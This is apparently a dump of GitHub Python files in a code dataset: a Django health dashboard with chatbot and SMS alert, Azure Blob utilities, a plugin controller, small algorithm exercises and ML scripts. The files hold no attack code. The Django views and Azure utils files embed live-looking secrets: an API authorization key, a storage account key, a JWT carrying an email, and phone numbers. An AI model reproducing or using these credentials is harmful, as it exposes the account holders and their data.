'https://healthservice.priaid.ch/symptoms?token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJlbWFpbCI6ImJvdXJuZWphc29tQGdtYWlsLmNvbSIsInJvbGUiOiJVc2VyIiwiaHR0cDovL3NjaGVtYXMueG1sc29hcC5vcmcvd3MvMjAwNS8wNS9pZGVudGl0eS9jbGFpbXMvc2lkIjoiMjE4NyIsImh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd3MvMjAwOC8wNi9pZGVudGl0eS9jbGFpbXMvdmVyc2lvbiI6IjEwOCIsImh0dHA6Ly9leGFtcGxlLm9yZy9jbGFpbXMvbGltaXQiOiIxMDAiLCJodHRwOi8vZXhhbXBsZS5vcmcvY2xhaW1zL21lbWJlcnNoaXAiOiJCYXNpYyIsImh0dHA6Ly9leGFtcGxlLm9yZy9jbGFpbXMvbGFuZ3VhZ2UiOiJlbi1nYiIsImh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd3MvMjAwOC8wNi9pZGVudGl0eS9jbGFpbXMvZXhwaXJhdGlvbiI6IjIwOTktMTItMzEiLCJodHRwOi8vZXhhbXBsZS5vcmcvY2xhaW1zL21lbWJlcnNoaXBzdGFydCI6IjIwMTktMDMtMzAiLCJpc3MiOiJodHRwczovL2F1dGhzZXJ2aWNlLnByaWFpZC5jaCIsImF1ZCI6Imh0dHBzOi8vaGVhbHRoc2VydmljZS5wcmlhaWQuY2giLCJleHAiOjE1NTQwMDMxOTUsIm5iZiI6MTU1Mzk5NTk5NX0.6jfHY8Svx35hiBY3ZgKbTxmOzfY6cbmMWu3GSFV9iUo&format=json&language=en-gb'\n r = requests.get(sympapiurl).json()\n dataset = events.objects.all()\n data = dataset.get(name = 'Harsh')\n\n return render(request , 'dashboard/index.html' ,{'r' : r , 'data':data })\n\n\ndef charts(request):\n \n return render(request, 'dashboard/charts.html')\n\ndef push(request):\n return render(request, 'dashboard/push.html')\n\n\ndef chatbot(request):\n requestlist = []\n responselist = []\n pythoncom.CoInitialize()\n dataset = events.objects.all()\n data = dataset.get(name = 'Harsh')\n bot = ChatBot('Sheku',tie_breaking_method=\"random_response\")\n trainer = ListTrainer(bot)\n sheku = pyttsx3.init()\n\n for _file in os.listdir('files'):\n \tchats = open(\"files/\" + _file , 'r').readlines()\n\n\n trainer.train(chats)\n\n request = request.POST['message']\n requestlist.append(request)\n response = bot.get_response(request)\n responselist.append(response)\n sheku.say(response)\n print(response)\n sheku.runAndWait()\n analyzer = SentimentIntensityAnalyzer()\n analy = analyzer.polarity_scores(response)\n\n if(analy['neg'] == 0.9 ):\n print(\"Sending a Text!\")\n url = \"https://www.fast2sms.com/dev/bulk\"\n\n querystring = {\"authorization\":\"oA10WXBMQbDtzSvRa5g3yhYl9kqEdNJZjscIrUfPxOu82w7GeTszBb1Yy5q7nTvjOg8fSolx0wuci2IX\",\"sender_id\":\"FSTSMS\",\"message\":\"Emergency Message! I am In Distress, Please reach out to me!\",\"language\":\"english\",\"route\":\"t\",\"numbers\":\"8898427027,9930335323,7021272227,7718904478\"}\n\n headers = {\n 'cache-control': \"no-cache\"\n }\n response = requests.request(\"GET\", url, headers=headers, params=querystring)\n print(response.text)\n\n\n return render_to_response('dashboard/widgets.html' , { 'requestlist': requestlist , 'responselist': responselist })\n\n\ndef widgets(request):\n # pythoncom.CoInitialize()\n dataset = events.objects.all()\n data = dataset.get(name = 'Harsh')\n # bot = ChatBot('Sheku',tie_breaking_method=\"random_response\")\n # trainer = ListTrainer(bot)\n # sheku = pyttsx3.init()\n #\n # for _file in os.listdir('files'):\n # \tchats = open(\"files/\" + _file , 'r').readlines()\n #\n # trainer.train(chats)\n #\n # request = request.POST['message']\n # response = bot.get_response(request)\n # sheku.say(response)\n # print(response)\n # sheku.runAndWait()\n #\n\n # while True:\n # \trequest = input(data.name +':')\n # \tresponse = bot.get_response(request)\n # \tsheku.say(response)\n # \tprint(\"Sheku:\",response)\n # \tsheku.runAndWait()\n\n\n return render(request, 'dashboard/widgets.html' , { 'data': data})\n","repo_name":"AzizYR/HealthCare","sub_path":"dashboard/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15743699606","text":"import json\r\nimport pandas as pd\r\nfrom pandas import json_normalize\r\nfrom azure.storage.blob import BlobServiceClient, BlobClient, ContainerClient\r\nimport os\r\nimport re\r\n\r\nConnection_String_to_blob = os.environ.get('Connection_String_to_blob')\r\n\r\ndef get_blob_service_client():\r\n connection_string = Connection_String_to_blob\r\n return BlobServiceClient.from_connection_string(connection_string)\r\n\r\ndef upload_to_blob_storage(file_path, filename):\r\n blob_service_client = get_blob_service_client()\r\n container_name = 'peearzchatdocupload' # Create a container in your Blob storage account\r\n\r\n # Get a blob client\r\n blob_client = blob_service_client.get_blob_client(container=container_name, blob=filename)\r\n\r\n # Upload the file to Blob storage\r\n with open(file_path, 'rb') as data:\r\n blob_client.upload_blob(data, overwrite=True)\r\n\r\ndef json_csv(path_to_store, file):\r\n\r\n dictionary = json.loads(file)\r\n\r\n df = None\r\n first = True\r\n\r\n for document in dictionary:\r\n if document == None:\r\n continue\r\n else:\r\n dfLeft = json_normalize(document)\r\n\r\n for title, value in document.items():\r\n if type(value) == list:\r\n dfLeft.drop(title, axis=\"columns\", inplace=True)\r\n dfRight = json_normalize(value)\r\n dfRight = dfRight.add_prefix(f\"{title}_\")\r\n dfLeft = pd.concat([dfLeft, dfRight], axis = 1) \r\n\r\n if first:\r\n df = dfLeft\r\n first = False\r\n else:\r\n df = pd.concat([df, dfLeft], axis = 0)\r\n\r\n df.reset_index(inplace=True, drop=True)\r\n\r\n df1 = df.T.drop_duplicates().T\r\n\r\n #file_location = os.path.join(app.config['UPLOAD_FOLDER'])\r\n #df1.to_csv('file_path/test.csv')\r\n\r\n df1.to_csv('test.csv')\r\n #upload_to_blob_storage(os.path.join(path_to_store, 'test.csv'), 'test.csv')\r\n\r\ndef rename_ivalidfilename(filename):\r\n # Funtion used to Remove any characters that are non alphanumeric\r\n return re.sub(r'[^a-zA-Z0-9\\.\\-_]', '', filename)\r\n\r\ndef blob_filereader(account_name, account_key, container_name):\r\n # Funtion used to read all the files in blob storage\r\n try:\r\n # Creating BlobServiceClient by providing account credentials\r\n account_creds = BlobServiceClient(account_url=f\"https://{account_name}.blob.core.windows.net\", credential=account_key)\r\n \r\n # Getting a reference to the container\r\n container_client = account_creds.get_container_client(container_name)\r\n\r\n # Listing all files in the container\r\n blob_files = container_client.list_blobs()\r\n\r\n for blob in blob_files:\r\n # Extract the blob name\r\n blob_name = blob.name\r\n\r\n # Renaming the blob name to remove non alpanumeric characters\r\n rename_blob_name = rename_ivalidfilename(blob_name)\r\n\r\n # Downloading and handling files without attempting to decode them\r\n file_extension = rename_blob_name.split('.')[-1]\r\n blob_client = container_client.get_blob_client(blob_name)\r\n\r\n if file_extension in ['pdf', 'png', 'jpg', 'csv', 'json', 'txt']:\r\n try:\r\n content = blob_client.download_blob().readall()\r\n with open(rename_blob_name, 'wb') as file:\r\n file.write(content)\r\n print(f\"File Downloaded: {rename_blob_name}\")\r\n except Exception as e:\r\n print(f\"Error downloading {rename_blob_name}: {str(e)}\")\r\n else:\r\n # Read and print the contents of text files\r\n try:\r\n content = blob_client.download_blob().readall()\r\n print(f\"Contents of {rename_blob_name}: {content.decode('utf-8')}\")\r\n except Exception as e:\r\n print(f\"Error reading {rename_blob_name}: {str(e)}\")\r\n except Exception as e:\r\n print(f\"An error occurred: {str(e)}\")\r\n \r\n \r\naccount_name = 'peearztest'\r\naccount_key = '2SIi75BD/kTMdGkvCjH8uI1hTH436whrLkTKRJBOG413rV3VRGElBbtAg4zw9E0wn180jku8je5g+ASt42Kttw=='\r\ncontainer_name = 'peearziois'\r\nblob_filereader(account_name, account_key, container_name)\r\n\r\n'''def json_csv(path_to_csv, file): # NEW FUNCTION 3\r\n #print(\"FILE IS :\",file)\r\n df = pd.read_json(file)\r\n print(df.head())\r\n df.to_csv('test.csv')'''\r\n\r\n'''\r\ndef fetch_file_from_blob(container_name, blob_name, destination_path):\r\n blob_service_client = get_blob_service_client()\r\n container_client = blob_service_client.get_container_client(container_name)\r\n blob_client = container_client.get_blob_client(blob_name)\r\n\r\n with open(destination_path, \"wb\") as file:\r\n blob_data = blob_client.download_blob()\r\n file.write(blob_data.readall())\r\n\r\ndef json_csv(json_file_path, csv_file_path): NEW FUNCTION 2\r\n \"\"\"\r\n Convert a JSON file to a CSV file.\r\n\r\n Parameters:\r\n json_file_path (str): Path to the input JSON file.\r\n csv_file_path (str): Path to the output CSV file.\r\n \"\"\"\r\n with open(json_file_path, 'r') as json_file:\r\n data = json.load(json_file)\r\n\r\n with open(csv_file_path, 'w', newline='') as csv_file:\r\n # Extract the headers from the first item in the JSON data\r\n headers = list(data[0].keys())\r\n\r\n # Create a CSV writer and write the header row\r\n writer = csv.DictWriter(csv_file, fieldnames=headers)\r\n writer.writeheader()\r\n\r\n # Write each row to the CSV file\r\n writer.writerows(data)\r\n\r\ndef download_blob_to_file(container_name='peearzchatdocupload'):\r\n blob_service_client = get_blob_service_client()\r\n blob_client = blob_service_client.get_blob_client(container=container_name, blob=\"test.csv\")\r\n with open(file=os.path.join(r'/Users/ankitanand/Documents/Peearz/', 'test.csv'), mode=\"wb\") as sample_blob:\r\n download_stream = blob_client.download_blob()\r\n sample_blob = download_stream.readall()\r\n return sample_blob'''\r\n","repo_name":"pranav3993/Doc_Chat_App","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37697080054","text":"# -*- coding: UTF-8 -*-\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\n__author__ = \"d01\"\n__email__ = \"jungflor@gmail.com\"\n__copyright__ = \"Copyright (C) 2015-16, Florian JUNG\"\n__license__ = \"MIT\"\n__version__ = \"0.1.0\"\n__date__ = \"2016-03-29\"\n# Created: 2015-06-10 23:54\n\nimport threading\n\nfrom .pluginInterface import Plugin, PluginStartException\nfrom paps.person import Person\n\n\nclass CrowdController(Plugin):\n \"\"\"\n Manages the audience state and the plugins\n \"\"\"\n\n def __init__(self, settings=None):\n \"\"\"\n Initialize object\n\n :param settings: Settings to be passed to init (default: None)\n :type settings: dict | None\n :rtype: None\n :raises ValueError: No plugins given\n \"\"\"\n if settings is None:\n settings = {}\n super(CrowdController, self).__init__(settings)\n\n self.plugins = settings.get('plugins')\n \"\"\" :type plugins: list[paps.crowd.pluginInterface.Plugin] \"\"\"\n if not self.plugins:\n raise ValueError(\"No plugins registered\")\n self._people = {}\n \"\"\" Current state of audience - person.id: Person()\n :type _people: dict[str, paps.person.Person] \"\"\"\n self._people_lock = threading.Lock()\n \"\"\" Lock to control access to ._people \"\"\"\n\n def on_person_new(self, people):\n \"\"\"\n New people joined the audience\n\n :param people: People that just joined the audience\n :type people: list[paps.person.Person]\n :rtype: None\n \"\"\"\n self.debug(\"()\")\n changed = []\n with self._people_lock:\n for p in people:\n person = Person.from_person(p)\n if person.id in self._people:\n self.warning(\n u\"{} already in audience\".format(person.id)\n )\n self._people[person.id] = person\n changed.append(person)\n for plugin in self.plugins:\n try:\n plugin.on_person_new(changed)\n except:\n self.exception(\n u\"Failed to send new people to {}\".format(plugin.name)\n )\n\n def on_person_leave(self, people):\n \"\"\"\n People left the audience\n\n :param people: People that left\n :type people: list[paps.person.Person]\n :rtype: None\n \"\"\"\n self.debug(\"()\")\n changed = []\n with self._people_lock:\n for p in people:\n person = Person.from_person(p)\n if person.id not in self._people:\n self.warning(u\"{} not in audience\".format(person.id))\n else:\n del self._people[person.id]\n changed.append(person)\n for plugin in self.plugins:\n try:\n plugin.on_person_leave(changed)\n except:\n self.exception(\n u\"Failed to send leaving people to {}\".format(plugin.name)\n )\n\n def on_person_update(self, people):\n \"\"\"\n People have changed (e.g. a sensor value)\n\n :param people: People whos state changed (may include unchanged)\n :type people: list[paps.person.Person]\n :rtype: None\n \"\"\"\n self.debug(\"()\")\n changed = []\n with self._people_lock:\n for p in people:\n person = Person.from_person(p)\n if person.id not in self._people:\n self.warning(u\"{} not in audience\".format(person.id))\n self._people[person.id] = person\n # Check if really changed? - trust source for now\n changed.append(person)\n for plugin in self.plugins:\n try:\n plugin.on_person_update(changed)\n except:\n self.exception(\n u\"Failed to send updated people to {}\".format(plugin.name)\n )\n\n @property\n def people(self):\n \"\"\"\n Get people of current audience\n\n :return: Current people\n :rtype: list[paps.people.People]\n \"\"\"\n with self._people_lock:\n return self._people.values()\n\n def start(self, blocking=False):\n \"\"\"\n Start the interface\n\n :param blocking: Should the call block until stop() is called\n (default: False)\n :type blocking: bool\n :rtype: None\n \"\"\"\n self.debug(\"()\")\n # Start the plugins\n for plugin in self.plugins:\n try:\n # Inject self into plugin\n plugin.controller = self\n plugin.start(blocking=False)\n except:\n self.exception(\n u\"Failed to start plugin {}\".format(plugin.name)\n )\n raise PluginStartException(\n \"Starting one or more plugins failed\"\n )\n super(CrowdController, self).start(blocking=blocking)\n\n def stop(self):\n \"\"\"\n Stop the interface\n\n :rtype: None\n \"\"\"\n self.debug(\"()\")\n # Stop the plugins\n for plugin in self.plugins:\n try:\n plugin.stop()\n except:\n self.exception(u\"Failed to stop plugin {}\".format(plugin.name))\n super(CrowdController, self).stop()\n","repo_name":"the01/python-paps","sub_path":"paps/crowd/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":5482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"29375565057","text":"class Solution(object):\n def coinChange(self, coins: list, amount):\n \"\"\"\n :type coins: List[int]\n :type amount: int\n :rtype: int\n \"\"\"\n _len = len(coins)\n dp = [10000 for _ in range(amount + 1)]\n dp[0] = 0\n for i in range(1, amount + 1):\n if i in coins:\n dp[i] = 1\n continue\n for j in coins:\n dp[i] = min(dp[i - j] + 1, dp[i]) if i - j >= 0 else dp[i]\n return dp[-1] if dp[-1] < 10000 else -1\n\n\nif __name__ == '__main__':\n print(Solution().coinChange([312343256], 2))\n","repo_name":"wangqi1996/leetcode","sub_path":"coin-change.py","file_name":"coin-change.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42574015154","text":"from sinv.algorithms import bcr_s\nfrom sinv import utils\n\nimport numpy as np\nimport pytest\nfrom mpi4py import MPI\n\nSEED = 63\n\n\n\n\"\"\" Uniform blocksize tests cases \n- Complex and real matrices\n- Symmetric and non-symmetric matrices\n================================================\n| Test n | Matrice size | Blocksize | nblocks | \n================================================\n| Test 1 | 2x2 | 1 | 2 |\n| Test 2 | 4x4 | 2 | 2 |\n| Test 3 | 6x6 | 3 | 2 |\n================================================\n| Test 4 | 3x3 | 1 | 3 |\n| Test 5 | 6x6 | 2 | 3 |\n| Test 6 | 9x9 | 3 | 3 |\n================================================\n| Test 7 | 128x128 | 8 | 16 |\n| Test 8 | 128x128 | 16 | 8 |\n| Test 9 | 128x128 | 32 | 4 |\n================================================ \"\"\"\n@pytest.mark.mpi_skip()\n@pytest.mark.parametrize(\"is_complex\", [False, True])\n@pytest.mark.parametrize(\"is_symmetric\", [False, True])\n@pytest.mark.parametrize(\n \"matrix_size, blocksize\",\n [\n (9, 1),\n (18, 2),\n (27, 3),\n (12, 1),\n (24, 2),\n (36, 3),\n (256, 8),\n (240, 10),\n (144, 12),\n ]\n)\ndef test_bcrs(\n is_complex: bool,\n is_symmetric: bool,\n matrix_size: int,\n blocksize: int\n):\n \"\"\" Test the BSR-S algorithm. \"\"\"\n bandwidth = np.ceil(blocksize/2)\n \n A = utils.matu.generateBandedDiagonalMatrix(matrix_size, bandwidth, is_complex, is_symmetric, SEED)\n\n G = bcr_s.bcr_serial(A, blocksize)\n G_bcr_s_bloc_diag, G_bcr_s_bloc_upper, G_bcr_s_bloc_lower = utils.matu.convertDenseToBlkTridiag(G, blocksize)\n \n A_refsol = np.linalg.inv(A)\n A_refsol_bloc_diag, A_refsol_bloc_upper, A_refsol_bloc_lower = utils.matu.convertDenseToBlkTridiag(A_refsol, blocksize)\n \n assert np.allclose(A_refsol_bloc_diag, G_bcr_s_bloc_diag)\n assert np.allclose(A_refsol_bloc_upper, G_bcr_s_bloc_upper)\n assert np.allclose(A_refsol_bloc_lower, G_bcr_s_bloc_lower)\n \n \n ","repo_name":"Nano-TCAD/SINV","sub_path":"tests/bcr_tests/bcr_serial_test.py","file_name":"bcr_serial_test.py","file_ext":"py","file_size_in_byte":2151,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"3267167566","text":"from elliptics.core import Node\nfrom socket import AF_INET\nfrom elliptics.route import Address\n\n\nclass Node(Node):\n def add_remote(self, addr, port=None, family=AF_INET):\n if type(addr) is Address:\n super(Node, self).add_remote(addr=addr.host,\n port=addr.port,\n family=addr.family)\n elif not port and type(addr) is str:\n super(Node, self).add_remote(addr=addr)\n elif port and type(addr) is str:\n super(Node, self).add_remote(addr=addr,\n port=port,\n family=family)\n","repo_name":"dkangin/elliptics","sub_path":"bindings/python/src/node.py","file_name":"node.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"9852067064","text":"import streamlit as st\r\nimport pickle\r\nimport string\r\nfrom nltk.corpus import stopwords\r\nfrom nltk.stem.porter import PorterStemmer\r\nfrom nltk.tokenize import word_tokenize\r\nimport os\r\nimport nltk\r\n\r\ntfidf = pickle.load(open('tfidfv', 'rb'))\r\nmodel=pickle.load(open('mnbc','rb'))\r\nnltk.download('stopwords')\r\nnltk.download('punkt')\r\nst.title('SMS Spam Classifier')\r\nsms=st.text_area(label='sms input')\r\n\r\ndef vector_text(text):\r\n text=text.lower()\r\n text=text.translate(str.maketrans('','',string.punctuation))\r\n ps=PorterStemmer()\r\n text=' '.join([ps.stem(word) for word in word_tokenize(text) if word not in stopwords.words('english')])\r\n return text\r\nif st.button('Know Spam sms'):\r\n cleaned_sms=vector_text(sms)\r\n vector_sms=tfidf.transform([cleaned_sms])\r\n pred=model.predict(vector_sms)[0]\r\n if pred==1:\r\n st.header('Spam')\r\n else:\r\n st.header('Not Spam')\r\n","repo_name":"haripy123/spam-classifier","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32659506299","text":"import sys\n\n# 시, 분, 초를 입력하고 추가 add_sec 시간을 입력\nh, m, s = map(int, sys.stdin.readline().split())\nadd_sec = int(sys.stdin.readline())\n\n# 시,분,초를 초단위로 통합\ntotal_time = h * 3600 + m * 60 + s + add_sec\n\n# add_sec를 추가한 후의 시,분,초를 구함\nafter_hour = (total_time // 3600) \nafter_min = (total_time - (after_hour * 3600)) // 60\nafter_sec = total_time - (after_hour * 3600) - (after_min * 60)\n\nprint(after_hour % 24, after_min, after_sec)","repo_name":"KimHyungkeun/Algorithm","sub_path":"Baekjoon/수학/2530_인공지능시계.py","file_name":"2530_인공지능시계.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74862765584","text":"def minimumBribes(q):\n bribes = 0\n\n for i, a in enumerate(q):\n i_adj = i + 1\n\n if a - i_adj > 2:\n print(\"Too chaotic\")\n return\n \n for b in q[max(a-2, 0):i]:\n if b > a:\n bribes += 1\n \n print(bribes)\n \nif __name__ == '__main__':\n t = int(input().strip())\n\n for t_itr in range(t):\n n = int(input().strip())\n\n q = list(map(int, input().rstrip().split()))\n\n minimumBribes(q)\n","repo_name":"lrmantovani10/Algorithms","sub_path":"Arrays/New_Years_Chaos.py","file_name":"New_Years_Chaos.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"44458470378","text":"isbn = input(\"ISBN碼:\")\nnum=[]\n\nfor i in isbn:\n if i=='X':\n num.append(10)\n else:\n num.append(int(i))\n\nfor i in range(len(num)-1):\n num[i+1] = num[i] + num[i+1]\nprint(\"第一次累加和:\" , num)\n\nfor i in range(len(num)-1):\n num[i+1] = num[i] + num[i+1]\nprint(\"第二次累加和:\" , num)\n\nif num[-1]%11 == 0:\n print(\"YES\")\nelse:\n print(\"NO\")\n","repo_name":"Jia35/-Python-Tutorial","sub_path":"file/code/hw17.py","file_name":"hw17.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40713199578","text":"from __future__ import annotations\nimport datetime\nfrom dataclasses import dataclass, field\nfrom kiota_abstractions.serialization import AdditionalDataHolder, Parsable, ParseNode, SerializationWriter\nfrom kiota_abstractions.store import BackedModel, BackingStore, BackingStoreFactorySingleton\nfrom typing import Any, Callable, Dict, List, Optional, TYPE_CHECKING, Union\nfrom uuid import UUID\n\nif TYPE_CHECKING:\n from .account import Account\n\n@dataclass\nclass JournalLine(AdditionalDataHolder, BackedModel, Parsable):\n # Stores model information.\n backing_store: BackingStore = field(default_factory=BackingStoreFactorySingleton(backing_store_factory=None).backing_store_factory.create_backing_store, repr=False)\n\n # Stores additional data not described in the OpenAPI description found when deserializing. Can be used for serialization as well.\n additional_data: Dict[str, Any] = field(default_factory=dict)\n # The account property\n account: Optional[Account] = None\n # The accountId property\n account_id: Optional[UUID] = None\n # The accountNumber property\n account_number: Optional[str] = None\n # The amount property\n amount: Optional[float] = None\n # The comment property\n comment: Optional[str] = None\n # The description property\n description: Optional[str] = None\n # The documentNumber property\n document_number: Optional[str] = None\n # The externalDocumentNumber property\n external_document_number: Optional[str] = None\n # The id property\n id: Optional[UUID] = None\n # The journalDisplayName property\n journal_display_name: Optional[str] = None\n # The lastModifiedDateTime property\n last_modified_date_time: Optional[datetime.datetime] = None\n # The lineNumber property\n line_number: Optional[int] = None\n # The OdataType property\n odata_type: Optional[str] = None\n # The postingDate property\n posting_date: Optional[datetime.date] = None\n \n @staticmethod\n def create_from_discriminator_value(parse_node: Optional[ParseNode] = None) -> JournalLine:\n \"\"\"\n Creates a new instance of the appropriate class based on discriminator value\n param parse_node: The parse node to use to read the discriminator value and create the object\n Returns: JournalLine\n \"\"\"\n if not parse_node:\n raise TypeError(\"parse_node cannot be null.\")\n return JournalLine()\n \n def get_field_deserializers(self,) -> Dict[str, Callable[[ParseNode], None]]:\n \"\"\"\n The deserialization information for the current model\n Returns: Dict[str, Callable[[ParseNode], None]]\n \"\"\"\n from .account import Account\n\n from .account import Account\n\n fields: Dict[str, Callable[[Any], None]] = {\n \"account\": lambda n : setattr(self, 'account', n.get_object_value(Account)),\n \"accountId\": lambda n : setattr(self, 'account_id', n.get_uuid_value()),\n \"accountNumber\": lambda n : setattr(self, 'account_number', n.get_str_value()),\n \"amount\": lambda n : setattr(self, 'amount', n.get_float_value()),\n \"comment\": lambda n : setattr(self, 'comment', n.get_str_value()),\n \"description\": lambda n : setattr(self, 'description', n.get_str_value()),\n \"documentNumber\": lambda n : setattr(self, 'document_number', n.get_str_value()),\n \"externalDocumentNumber\": lambda n : setattr(self, 'external_document_number', n.get_str_value()),\n \"id\": lambda n : setattr(self, 'id', n.get_uuid_value()),\n \"journalDisplayName\": lambda n : setattr(self, 'journal_display_name', n.get_str_value()),\n \"lastModifiedDateTime\": lambda n : setattr(self, 'last_modified_date_time', n.get_datetime_value()),\n \"lineNumber\": lambda n : setattr(self, 'line_number', n.get_int_value()),\n \"@odata.type\": lambda n : setattr(self, 'odata_type', n.get_str_value()),\n \"postingDate\": lambda n : setattr(self, 'posting_date', n.get_date_value()),\n }\n return fields\n \n def serialize(self,writer: SerializationWriter) -> None:\n \"\"\"\n Serializes information the current object\n param writer: Serialization writer to use to serialize this model\n Returns: None\n \"\"\"\n if not writer:\n raise TypeError(\"writer cannot be null.\")\n writer.write_object_value(\"account\", self.account)\n writer.write_uuid_value(\"accountId\", self.account_id)\n writer.write_str_value(\"accountNumber\", self.account_number)\n writer.write_float_value(\"amount\", self.amount)\n writer.write_str_value(\"comment\", self.comment)\n writer.write_str_value(\"description\", self.description)\n writer.write_str_value(\"documentNumber\", self.document_number)\n writer.write_str_value(\"externalDocumentNumber\", self.external_document_number)\n writer.write_uuid_value(\"id\", self.id)\n writer.write_str_value(\"journalDisplayName\", self.journal_display_name)\n writer.write_datetime_value(\"lastModifiedDateTime\", self.last_modified_date_time)\n writer.write_int_value(\"lineNumber\", self.line_number)\n writer.write_str_value(\"@odata.type\", self.odata_type)\n writer.write_date_value(\"postingDate\", self.posting_date)\n writer.write_additional_data_value(self.additional_data)\n \n\n","repo_name":"microsoftgraph/msgraph-beta-sdk-python","sub_path":"msgraph_beta/generated/models/journal_line.py","file_name":"journal_line.py","file_ext":"py","file_size_in_byte":5388,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"48"} +{"seq_id":"74097266384","text":"\"\"\"\noriginal TFIDF model\n\"\"\"\n\nimport os; os.environ['OMP_NUM_THREADS'] = '1'\nfrom contextlib import contextmanager\nfrom functools import partial\nfrom operator import itemgetter\nfrom multiprocessing.pool import ThreadPool\nimport time\nfrom typing import List, Dict\n\nimport keras as ks\nimport pandas as pd\nimport numpy as np\nimport tensorflow as tf\nfrom sklearn.feature_extraction import DictVectorizer\nfrom sklearn.feature_extraction.text import TfidfVectorizer as Tfidf\nfrom sklearn.pipeline import make_pipeline, make_union, Pipeline, FeatureUnion\nfrom sklearn.preprocessing import FunctionTransformer, StandardScaler\nfrom sklearn.metrics import mean_squared_log_error\nfrom sklearn.model_selection import KFold\nfrom sklearn.base import TransformerMixin\n\nBASE_DIR = os.getcwd()\nBASE_DIR = os.path.dirname(BASE_DIR)\n\n# @contextmanager\ndef timer(name):\n t0 = time.time()\n yield\n #print(f'[{name}] done in {time.time() - t0:.0f} s')\n\ndef preprocess(df: pd.DataFrame) -> pd.DataFrame:\n df['name'] = df['name'].fillna('') + ' ' + df['brand_name'].fillna('')\n df['text'] = (df['item_description'].fillna('') + ' ' + df['name'] + ' ' + df['category_name'].fillna(''))\n return df\n\ndef on_field(f: str, *vec) -> Pipeline:\n return make_pipeline(FunctionTransformer(itemgetter(f), validate=False), *vec)\n\ndef to_records(df: pd.DataFrame) -> List[Dict]:\n return df.to_dict(orient='records')\n\ndef fit_predict(xs, y_train) -> np.ndarray:\n X_train, X_test = xs\n # config = tf.ConfigProto(\n # intra_op_parallelism_threads=1, use_per_session_threads=1, inter_op_parallelism_threads=1)\n with tf.Session( graph=tf.Graph() ) as sess :\n ks.backend.set_session(sess)\n model_in = ks.Input(shape=(X_train.shape[1],), dtype='float32', sparse=True)\n out = ks.layers.Dense(192, activation='relu')(model_in)\n out = ks.layers.Dense(64, activation='relu')(out)\n out = ks.layers.Dense(64, activation='relu')(out)\n out = ks.layers.Dense(1)(out)\n model = ks.Model(model_in, out)\n model.compile(loss='mean_squared_error', optimizer=ks.optimizers.Adam(lr=3e-3))\n for i in range(3):\n # with timer(f'epoch {i + 1}'):\n model.fit(x=X_train, y=y_train, batch_size=2**(11 + i), epochs=1, verbose=0)\n return model.predict(X_test)[:, 0]\n\nclass ColumnExtractor(TransformerMixin):\n def __init__(self, cols):\n self.cols = cols\n\n def fit(self, X, y=None):\n # stateless transformer\n return self\n\n def transform(self, X):\n # assumes X is a DataFrame\n Xcols = X[self.cols]\n return Xcols\n\nclass ToDict(TransformerMixin):\n def __init__(self, cols):\n self.cols = cols\n\n def fit(self, X, y=None):\n # stateless transformer\n return self\n\n def transform(self, X):\n # assumes X is a DataFrame\n Xdict = X.to_dict('records')\n return Xdict\n\n\nvectorizer = FeatureUnion([\n ('continuous', Pipeline([\n ('extract', ColumnExtractor('name')),\n ('tfidf', Tfidf(max_features=100000, token_pattern='\\w+'))\n ])),\n ('text', Pipeline([\n ('extract', ColumnExtractor('text')),\n ('tfidf', Tfidf(max_features=100000, token_pattern='\\w+', ngram_range=(1, 2)))\n ])),\n ('shippingCondition', Pipeline([\n ('extract', ColumnExtractor(['shipping', 'item_condition_id'])),\n ('ToDict', ToDict(['shipping', 'item_condition_id'])),\n ('DictVectorizer', DictVectorizer())\n ])),\n ])\n\ny_scaler = StandardScaler()\n\n\ndef load_data():\n train = pd.read_csv(os.path.join(os.path.join(BASE_DIR, 'Challenge\\Data'), 'train_mock.tsv'),\n sep='\\t', encoding='utf-8')\n train = train[train['price'] > 0].reset_index(drop=True)\n train = preprocess(train)\n\n valid = pd.read_csv(os.path.join(os.path.join(BASE_DIR, 'data'), 'test_mock.tsv'),\n sep='\\t', encoding='utf-8')\n valid = valid[valid['price'] > 0].reset_index(drop=True)\n valid = preprocess(valid)\n\n return train, valid\n\ndef main():\n train, valid =load_data()\n y_train = y_scaler.fit_transform(np.log1p(train['price'].values.reshape(-1, 1)))\n X_train = vectorizer.fit_transform(preprocess(train)).astype(np.float32)\n print(f'X_train: {X_train.shape} of {X_train.dtype}')\n #del train\n X_valid = vectorizer.transform(preprocess(valid)).astype(np.float32)\n print('X_valid shape:')\n print(X_valid.shape)\n\n #################\n Xb_train, Xb_valid = [x.astype(np.bool).astype(np.float32) for x in [X_train, X_valid]]\n xsb = [Xb_train, Xb_valid]\n xs = [X_train, X_valid]\n y_pred1 = fit_predict(xs, y_train)\n y_pred2 = fit_predict(xs, y_train)\n 